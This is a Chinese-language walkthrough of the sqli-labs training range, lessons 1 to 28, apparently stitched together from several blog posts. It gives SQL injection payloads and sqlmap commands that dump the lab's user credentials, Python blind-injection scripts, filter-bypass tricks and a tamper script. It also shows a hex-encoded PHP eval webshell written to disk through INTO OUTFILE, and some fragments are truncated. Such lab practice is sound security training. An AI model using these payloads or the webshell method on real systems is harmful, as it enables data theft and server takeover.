环境搭建
Sqli-labs是一个帮你总结大部分SQL注入漏洞类型的靶场,学习SQL注入漏洞原理,复现SQL注入漏洞必备靶场环境,玩起来吧!SQLi-LABS项目地址:https://github.com/Audi-1/sqli-labs,经过美化的项目地址:https://github.com/himadriganguly/sqlilabs,可以使用phpstudy或者web环境直接搭建运行,具体搭建步骤可以参考另一篇文章SQL注入靶场之sqlilabs搭建指南
http://localhost/sqlilabs/practice/example1.php?id=1'
http://localhost/sqlilabs/practice/example1.php?id=1' %23
http://localhost/sqlilabs/practice/example1.php?id=1' order by 3%23 # 正常
http://localhost/sqlilabs/practice/example1.php?id=1' order by 4%23 # 页面显示错误
说明字段数为3
# 判断显示的信息点,通过id=-1来执行联合查询
http://localhost/sqlilabs/practice/example1.php?id=-1' union select 1,2,3%23
http://localhost/sqlilabs/practice/example1.php?id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+
http://localhost/sqlilabs/practice/example1.php?id=-1' UNION SELECT 1,2,group_concat(column_name) FROM information_schema.columns WHERE table_schema ='sqlilabs' AND table_name='users' --+
http://localhost/sqlilabs/practice/example1.php?id=-1' UNION SELECT 1,group_concat(username SEPARATOR '-'),group_concat(password SEPARATOR '-') FROM users --+
将整个表内容显示出来了
```
sqlmap -u “注入地址” -v 1 –-dbs # 列举数据库
sqlmap -u “注入地址” -v 1 –-current-db # 当前数据库
sqlmap -u “注入地址” -v 1 –-users # 列数据库用户
sqlmap -u “注入地址” -v 1 -D “数据库” –-tables # 列举数据库的表名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” –-columns # 获取表的列名
sqlmap.py -u “注入地址” -v 1 -T “表名” -D “数据库” -C “字段” –-dump # 获取表中的数据
```
http://localhost/sqlilabs2/Less-2/index.php?id=1'--+
http://localhost/sqlilabs2/Less-2/index.php?id=1 and 1=1--+
http://localhost/sqlilabs2/Less-2/index.php?id=1 and 12=2--+
说明执行了传入的payload,存在注入
http://localhost/sqlilabs2/Less-2/index.php?id=1 order by 3--+ # 正常
http://localhost/sqlilabs2/Less-2/index.php?id=1 order by 4--+ # 页面显示错误
说明字段数为3
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema = database()--+
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name = 'users' --+
http://localhost/sqlilabs2/Less-2/index.php?id=-1 union select 1,group_concat(username),group_concat(password) from users --+
加上单引号报错,发现存在)
http://localhost/sqlilabs2/Less-3/index.php?id=1') and 1=2 --+ # 报错
http://localhost/sqlilabs2/Less-3/index.php?id=1') and 1=1 --+ # 正常
直接上payload,将数据库脱出
http://localhost/sqlilabs2/Less-3/index.php?id=-1') union select 1,group_concat(username),group_concat(password) from users --+
加上双引号报错,发现存在"
http://localhost/sqlilabs2/Less-4/index.php?id=1") and 1=2 --+ # 报错
http://localhost/sqlilabs2/Less-4/index.php?id=1") and 1=1 --+ # 正常
直接上payload,将数据库脱出
http://localhost/sqlilabs2/Less-4/index.php?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
直接上payload 1-4关皆可以用该命令
sqlmap -u "http://localhost/sqlilabs2/Less-2/index.php?id=1" --batch -D security -T users --columns --dump
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
// take the variables
if(isset($_GET['id']))
{
$id=$_GET['id'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
// connectivity
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
</font> </div></br></br></br><center>
<img src="../images/Less-1.jpg" /></center>
</body>
</html>
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="3" color="#FFFF00">';
print_r(mysql_error());
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
但是会把错误的信息给打印出来
该注入原理可以查找资料,注入方式的有资料可以点击查看,如下只列举常遇到的十种报错注入的方式
和第五关类似,只要用双引号闭合即可
http://127.0.0.1/sqlilabs2/Less-6/index.php?id=-1" union select 1,count(),concat((floor(rand(0)2)),'--',(select concat(id,'-',username,'-',password) from security.users limit 0,1))x from information_schema.tables group by x%23
直接上payload(第五六题均可用)
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-5/index.php?id=1" --technique E -D security -T users --dump --batch
secure-file-priv - 如果文件导入不成功,确认Mysql配置文件my.ini下存在secure-file-priv - secure-file-priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的
mysql使用以下命令查看是否打开文件写入开关
show global variables like '%secure%'
修改my.ini添加secure-file-priv参数,没有填具体值表示不做限制(这样做其实很危险)
重启mysql即可
写入一句话木马
http://127.0.0.1/sqlilabs2/Less-7/index.php?id=-1')) union select 1,0x3c3f706870206576616c28245f504f53545b636d645d293b3f3e,3 into outfile "E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\mm2.php"--+
写入phpinfo
http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1')) 1,0x3c3f70687020706870696e666f28293b3f3e,3 into outfile "E:\softs\phpstudy_pro\WWW\sqlilabs2\Less-7\pp2.php--+
写入需要注意的
可以在文件目录查看发现文件写入成功
同时网页可以直接访问该文件并执行
http://127.0.0.1/sqlilabs2/Less-3/index.php?id=-1') union select 1,load_file('e:\mm.php'),3--+
文件读取
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-1/index.php?id=1" --file-read "E:\mm.php"
文件写入
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-7/index.php?id=1" --file-write "/home/bb/1.txt" --file-dest "E:\sql2.php" --batch---title: Sqlilabs通关笔记(8-10)盲注date: 2020-01-04 17:20:00tags: SQL注入categories: SQL注入
def checkurl(url):
res = requests.get(url)
if res.ok:
if 'You are in' in res.text:
return True
return False
def main():
flag = ''
for g in range(100):
for i in arlist:
payload = "substr((select group_concat(username,password) from users),%s,1) = \'%s\'--+" % (
g, i)
finalurl = Baseurl + payload
if checkurl(finalurl):
flag = flag + str(i)
print(flag)
sleep(0.2)
if __name__ == "__main__":
main()
```
直接上payload
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-8/index.php?id=1" --technique B -D security -T users -C username,password --dump --threads 10 --batch
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
?>
时间盲注源码如下
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
echo "<br>";
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else { echo "Please input the ID as parameter with numeric value";}
def checkurl(url):
try:
res = requests.get(url,timeout = 3)
return True
except Exception as e:
return False
def main():
flag = ''
for g in range(100):
for i in arlist:
payload = "if((substr((select group_concat(username,password) from users),%s,1) = \'%s\'),sleep(5),1)--+" % (
g, i)
finalurl = Baseurl + payload
if checkurl(finalurl):
flag = flag + str(i)
print(flag)
sleep(0.2)
if __name__ == "__main__":
main()
```
payload:
http://127.0.0.1/sqlilabs2/Less-10/index.php?id=1" and if((length(database())=8),sleep(5),1)--+
直接上payload(9-10通用)
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-9/index.php?id=1" --technique T -D security -T users -C username,password --dump --threads 10 --batch
已经显示输入框了,说明是POST提交方式的注入
uname=admin' order by 2#&passwd=&submit=Submit 正常uname=admin' order by 3#&passwd=&submit=Submit 不正常
payload直接查出数据库所有数据
uname=-admin' union select group_concat(username,password),2 from users#&passwd=&submit=Submit
uname=-admin") union select group_concat(username,password),2 from users#&passwd=&submit=Submit
uname=') and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit
uname=" and (updatexml(1,concat(0x7e,(select group_concat(username,password) from users),0x7e),1))#&passwd=&submit=Submit
uname=admin") and sleep(10)#&passwd=1&submit=Submit
如果要指定参数注入检测可以将该参数修改成*
sqlmap -r "1.txt" -p uname -D security -T users -C username,password --dump --technique ES --batch --threads 10
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-15/" -data "uname=admin&passwd=admin&submit=Submit" --batch --threads 10 --technique T --dbs
uname=admin&passwd=admin&submit=Submit
<?php
//including the Mysql connect parameters.
include("../sql-connections/sql-connect.php");
error_reporting(0);
function check_input($value)
{
if(!empty($value))
{
// truncation (see comments)截断15位
$value = substr($value,0,15);
}
// Stripslashes if magic quotes enabled 如果打开了魔法开关,会自动转义
if (get_magic_quotes_gpc())
{
// 将反斜杠去掉
$value = stripslashes($value);
}
// Quote if not a number
if (!ctype_digit($value))
{
// 自动转义
$value = "'" . mysql_real_escape_string($value) . "'";
}
else
{
$value = intval($value);
}
return $value;
}
// take the variables
if(isset($_POST['uname']) && isset($_POST['passwd']))
{
//making sure uname is not injectable
$uname=check_input($_POST['uname']);
$passwd=$_POST['passwd'];
//logging the connection parameters to a file for analysis.
$fp=fopen('result.txt','a');
fwrite($fp,'User Name:'.$uname."\n");
fwrite($fp,'New Password:'.$passwd."\n");
fclose($fp);
// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
//echo $row;
if($row)
{
//echo '<font color= "#0000ff">';
$row1 = $row['username'];
//echo 'Your Login name:'. $row1;
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);
echo "<br>";
if (mysql_error())
{
echo '<font color= "#FFFF00" font size = 3 >';
print_r(mysql_error());
echo "</br></br>";
echo "</font>";
}
else
{
echo '<font color= "#FFFF00" font size = 3 >';
//echo " You password has been successfully updated " ;
echo "<br>";
echo "</font>";
}
echo '<img src="../images/flag1.jpg" />';
//echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font size="4.5" color="#FFFF00">';
//echo "Bug off you Silly Dumb hacker";
echo "</br>";
echo '<img src="../images/slap1.jpg" />';
echo "</font>";
}
}
?>
passwd=_POST['passwd'];
update="UPDATE users SET password = '
uname=admin&passwd=' and (updatexml(1,concat(0x7e,(select user()),0x7e),1))#&submit=Submit
uname=admin&passwd=' and extractvalue(null,concat(0x7e,database(),0x7e))#&submit=Submit
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-17/" --data "uname=admin&passwd=woshiadmin&submit=Submit" -p passwd --dbms mysql --threads 10 --method POST --flush-session --fresh-queries --level 1 --risk 1 --technique E --dbs
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0)' and '1' = '1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0)' and (updatexml(1,concat(0x7e,user(),0x7e),1)) and '1' = '1
1.同理,本关的注入点在Referer参数,payload一样只是参数位置不同
1.同理,本关的注入点在cookie参数,payload一样只是参数位置不同
Cookie: uname=admin' and (updatexml(1,concat(0x7e,user(),0x7e),1)) and '1' = '1
1.同理,本关的注入点在cookie参数,和上一关payload一样只是编码方式不同
uname=YWRtaW4nIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdXNlcigpLDB4N2UpLDEpKSBhbmQgJzEnID0gJzE%3d
1.同理,本关的注入点在cookie参数,和上一关payload一样只是双引号闭合方式
uname=YWRtaW4iIGFuZCAodXBkYXRleG1sKDEsY29uY2F0KDB4N2UsdXNlcigpLDB4N2UpLDEpKSBhbmQgIjEiID0gIjE%3d
sqlmap -r "2.txt" -D security -T users --columns --dump --batch --technique E --batch --level 3 --threads 10
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-18/" --user-agent "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0' and '1'='1" --level 3 --threads 10 --dbms mysql --fresh-queries --flush-session -D security -T users --columns --dump --batch --technique E
level: 设置检测的方方面面和测试用例 - 默认是1,会尝试POST和GET - 2:Cookie也会加入检测 - 3:User-Agent和Referer也会检测, 更大的值会增加用例量
指定User-Agent
指定请求的内容
指定后端数据库,给定后端数据库的类型可以减少减少无关的测试用例.
fresh-queries会忽略之前的查询结果,进行重新请求操作
flush-session会清空当前URL相关的
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);
$fp=fopen('result.txt','a');
fwrite($fp,'ID:'.$id."\n");
fclose($fp);
$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
http://127.0.0.1/sqlilabs2/Less-23/?id=-1' union select 1,(select group_concat(username,password ) from users),3 and '1' = '1
if (isset($_POST['submit']))
{
# Validating the user input........
$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);
if($pass==$re_pass)
{
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
$res = mysql_query($sql) or die('You tried to be smart, Try harder!!!! :( ');
$row = mysql_affected_rows();
echo '<font size="3" color="#FFFF00">';
echo '<center>';
if($row==1)
{
echo "Password successfully updated";
}
else
{
header('Location: failed.php');
//echo 'You tried to be smart, Try harder!!!! :( ';
}
}
else
{
echo '<font size="5" color="#FFFF00"><center>';
echo "Make sure New Password and Retype Password fields have same value";
header('refresh:2, url=index.php');
}
}
因为没有报错注入的条件,时间盲注有点漫长可以尝试脚本注册然后再注入,确实有点麻烦
但本题目的是:对于存储型的注入,可以先将导致SQL注入的字符预先存到数据库中,当再次调用到这个恶意构造的字符时就可以触发注入
title: Sqlilabs通关笔记(25-28)绕过注入 date: 2020-01-07 16:58:27 tags: SQL注入
这个系列是绕过注入,题目已提示需要绕过的字符,且能显示出输入的payload
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
从代码可以看出是吧or和and忽略大小正则替换成空
#!/usr/bin/env python
"""
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""
import re
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL
def tamper(payload, **kwargs):
"""
Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
>>> tamper('and or')
'anandd oorr'
"""
retVal = payload
if payload:
retVal = re.sub(r"(?i)(and)", r"anandd", re.sub(r"(?i)(or)", "oorr", payload))
return retVal
sqlmap -u "http://127.0.0.1/sqlilabs2/Less-25/?id=1" --tamper "xx.py" --technique E --threads 10 --dbs --batch
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
//echo 'YOU ARE IN ........';
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font size="5" color="#FFFF00">';
//echo 'You are in...........';
//print_r(mysql_error());
//echo "You have an error in your SQL syntax";
echo "</br></font>";
echo '<font color= "#0000ff" font size= 3>';
}
}
else
{
echo "Please input the ID as parameter with numeric value";
}
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id); //Strip out AND (non case sensitive)
return $id;
}
http://127.0.0.1/sqlilabs2/Less-25a/?id=-1 union select 1,(select group_concat(username,passwoorrd) from users) ,3--+
function blacklist($id)
{
$id= preg_replace('/or/i',"", $id); //strip out OR (non case sensitive)
$id= preg_replace('/and/i',"", $id); //Strip out AND (non case sensitive)
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --
$id= preg_replace('/[#]/',"", $id); //Strip out #
$id= preg_replace('/[\s]/',"", $id); //Strip out spaces
$id= preg_replace('/[\/\\\\]/',"", $id); //Strip out slashes
return $id;
}
payload:
http://127.0.0.1/sqlilabs2/Less-26/?id=1'%26%26extractvalue(null,concat(0x7e,(select(group_concat(username,'~',passwoorrd))from(security.users)),0x7e))%7c%7c'1
payload
http://127.0.0.1/sqlilabs2/Less-26a/??id=1111')union%A0select(1),(select(group_concat(id,'~',username,'~',passwoorrd))from(security.users)),3%7c%7c('1
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union/s',"", $id); //Strip out union
$id= preg_replace('/select/s',"", $id); //Strip out select
$id= preg_replace('/UNION/s',"", $id); //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id); //Strip out SELECT
$id= preg_replace('/Union/s',"", $id); //Strip out Union
$id= preg_replace('/Select/s',"", $id); //Strip out select
return $id;
}
uniunionon selecselectt
select -> SeLect union -> UNion
payload
http://127.0.0.1/sqlilabs2/Less-27/?id=1'%09and%09updatexml(1,concat(0x7e,(SeleCt(group_concat(username,password))from(users)),0x7e),1)and'1
payload
http://127.0.0.1/sqlilabs2/Less-27a/?id=1"%09and%091=2%09%09uniunionon%09SElselectect%091,(SElect(group_concat(username,password))from(users)),3%09or%09"1
// connectivity
$sql="SELECT * FROM users WHERE id=('$id') LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{
echo "<font size='5' color= '#99FF00'>";
echo 'Your Login name:'. $row['username'];
echo "<br>";
echo 'Your Password:' .$row['password'];
echo "</font>";
}
else
{
echo '<font color= "#FFFF00">';
//print_r(mysql_error());
echo "</font>";
}
}
else { echo "Please input the ID as parameter with numeric value";}
function blacklist($id)
{
$id= preg_replace('/[\/\*]/',"", $id); //strip out /*
$id= preg_replace('/[--]/',"", $id); //Strip out --.
$id= preg_replace('/[#]/',"", $id); //Strip out #.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
//$id= preg_replace('/select/m',"", $id); //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id); //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id); //Strip out UNION & SELECT.
return $id;
}
union
union all select
直接上payload
http://127.0.0.1/sqlilabs2/Less-28/?id=1')%0aand%0a1=2%0aunion%0aall%0aselect%0a1,database(),3%0aor ('1
和上一关类似